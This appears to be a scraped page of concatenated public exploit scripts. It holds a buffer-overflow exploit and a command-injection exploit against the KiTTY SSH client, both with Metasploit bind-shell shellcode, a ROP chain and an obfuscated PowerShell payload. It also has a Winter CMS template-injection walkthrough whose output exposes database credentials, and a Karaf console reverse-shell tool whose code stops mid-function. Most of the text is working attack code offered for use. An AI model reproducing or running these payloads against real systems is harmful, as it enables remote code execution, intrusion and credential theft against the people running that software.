ISHACK AI BOT

# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-25004 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py # # windows/shell_bind_tcp - 355 bytes # # https://metasploit.com/ # # Encoder: x86/shikata_ga_nai # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #-------------------------------------------------------------------------------------# buf = b"" buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e" buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90" buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d" buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e" buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f" buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52" buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e" buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a" buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a" buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22" buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7" buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a" buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7" buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf" buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd" buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12" buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17" buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81" buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40" buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0" buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30" buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3" buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56" buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb" buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3" buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39" buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea" buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e" buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c" buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c" def shellcode(): sc = b'' sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444 sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444 sc += b'\x29\xD8' # sub eax,ebx sc += b'\x29\xC4' # sub esp,eax sc += buf sc += b'\x90' * (1042-len(sc)) assert len(sc) == 1042 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # PUSH ESP; RETN 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d # # Return Address Information: 0x00529720 : {pivot 324 / 0x144} : # # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1042 bytes # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'\x90' * 27 nops = b'\x90' * 88 escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471 escape_sequence += nops + b'\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()

# Exploit Title: KiTTY 0.76.1.13 - Command Injection # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-23749 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(cmd/windows/powershell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) # #----------------------------------------------------------------------------------------# import os import sys #-----------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw # #-----------------------------------------------------------------# shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create' shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G' shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa' shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey' shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh' shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4' shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1' shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK' shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM' shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB' shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f' shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0' shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+' shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+' shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY' shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2' shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+' shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k' shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc' shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL' shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve' shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f' shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr' shellcode += b'ess))).ReadToEnd()))\"' escape_sequence = b'\033]0;__rv:' escape_sequence += b'" & ' escape_sequence += shellcode escape_sequence += b' #\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()

# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Priview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will be see result : 49 Payload : {{ dump() }} Result : "*::database" => array:4 [▼ "default" => "mysql" "connections" => array:4 [▼ "sqlite" => array:5 [▼ "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite" "driver" => "sqlite" "foreign_key_constraints" => true "prefix" => "" "url" => null ] "mysql" => array:15 [▼ "charset" => "utf8mb4" "collation" => "utf8mb4_unicode_ci" "database" => "soft_pw3qsny" "driver" => "mysql" "engine" => "InnoDB" "host" => "localhost" "options" => [] "password" => "8QSz9(pT)3" "port" => 3306 "prefix" => "" "prefix_indexes" => true "strict" => true "unix_socket" => "" "url" => null "username" => "soft_pw3qsny" ] "pgsql" => array:12 [▶] "sqlsrv" => array:10 [▶] ] "migrations" => "migrations" "redis" => array:4 [▼ "client" => "phpredis" "options" => array:2 [▼ "cluster" => "redis" "prefix" => "winter_database_" ] "default" => array:5 [▼ "database" => "0" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] "cache" => array:5 [▼ "database" => "1" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] ] ] ]

#!/usr/bin/python # Exploit Title: [Karaf v4.4.3 Console RCE] # Date: [2023-08-07] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-karaf-exploits.git] # Vendor Homepage: [https://karaf.apache.org] # Software Link: [https://karaf.apache.org/download.html] # Version: [4.4.3] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 \ # --lhost=192.168.0.100 --lport=4444 \ # --creds=karaf:karaf """ This tool will let you open a reverse shell from the system that is running Karaf Console", """ import argparse import base64 import io import re import zipfile import requests # Content of the MANIFEST.MF file. MANIFEST_CONTENT = \ "Bundle-Name: RevShell\n" \ "Bundle-Description: Bundle openning a reverse shell connection.\n" \ "Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \ "Bundle-Vendor: VisionSpace\n" \ "Bundle-Version: 1.0.0\n" \ "Import-Package: org.osgi.framework\n" \ "Bundle-Activator: com.visionspace.osgi.revshell.Activator" # Activator.class bytecode template. ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \ b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \ b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \ b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \ b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \ b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \ b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \ b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \ b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \ b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \ b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \ b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \ b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \ b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \ b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \ b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \ b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \ b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \ b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \ b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \ b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \ b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \ b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \ b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \ b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \ b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \ b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \ b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \ b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \ b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \ b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \ b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \ b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \ b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \ b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \ b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \ b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \ b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \ b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \ b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \ b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \ b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \ b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \ b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \ b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \ b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \ b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \ b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \ b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \ b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \ b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \ b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \ b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \ b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \ b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \ b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \ b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \ b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \ b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \ b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \ b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \ b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \ b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \ b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \ b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \ b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \ b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \ b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \ b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \ b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \ b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \ b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \ b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \ b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \ b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \ b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \ b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \ b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \ b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \ b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \ b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \ b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \ b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \ b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \ b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \ b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \ b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \ b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \ b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \ b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \ b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \ b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \ b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \ b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \ b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \ b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \ b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \ b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \ b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \ b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \ b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \ b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \ b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \ b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \ b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \ b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \ b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \ b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \ b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \ b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \ b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \ b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \ b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \ b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \ b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \ b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \ b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \ b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \ b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \ b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \ b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \ b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \ b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \ b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \ b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \ b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \ b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \ b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \ b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \ b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \ b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \ b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \ b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \ b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \ b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \ b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \ b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \ b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \ b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \ b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \ b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \ b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \ b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \ b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \ b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \ b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \ b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \ b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \ b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \ b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \ b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \ b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \ b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \ b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \ b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \ b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \ b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \ b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \ b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \ b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \ b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \ b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \ b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \ b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \ b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \ b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \ b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \ b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \ b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \ b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \ b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \ b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \ b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \ b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \ b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \ b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \ b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \ b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \ b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \ b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \ b"\x32" # Items to be replaces within the bytecode of Activator.class # <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e> ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e" # <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e> ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e" def parse(): """ This function parses the command-line arguments. """ parser = argparse.ArgumentParser( prog="Karaf-Console-RCE", description="This tool will let you open a reverse shell from the " "system that is running Karaf Console", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=True) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=True) parser.add_argument("--creds", dest="creds", help="credentials in format <username:password>", type=str, required=True) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") return parser.parse_args() def extract_jsessionid(cookie): """ This function extracts the JSESSIONID from the cookie string. """ jsessionid = None regex = re.findall("JSESSIONID=([^;]+)", cookie) if len(regex) > 0: jsessionid = regex[0] return jsessionid def authenticate(target, basic_auth): """ This function connects to the URL and retrieves the JSESSIONID based on the Basic Authorization. """ jsessionid = None headers = { "Authorization": basic_auth } response = requests.get(target, headers=headers, allow_redirects=False, timeout=10) if (response.status_code == 302 and response.headers["Set-Cookie"]): jsessionid = extract_jsessionid(response.headers["Set-Cookie"]) return jsessionid def generate_payload(lhost, lport): """ This function generates the payload. It replaces the template payload with the `lhost` and `lport` arguments. """ payload = None lhost_byte_array = 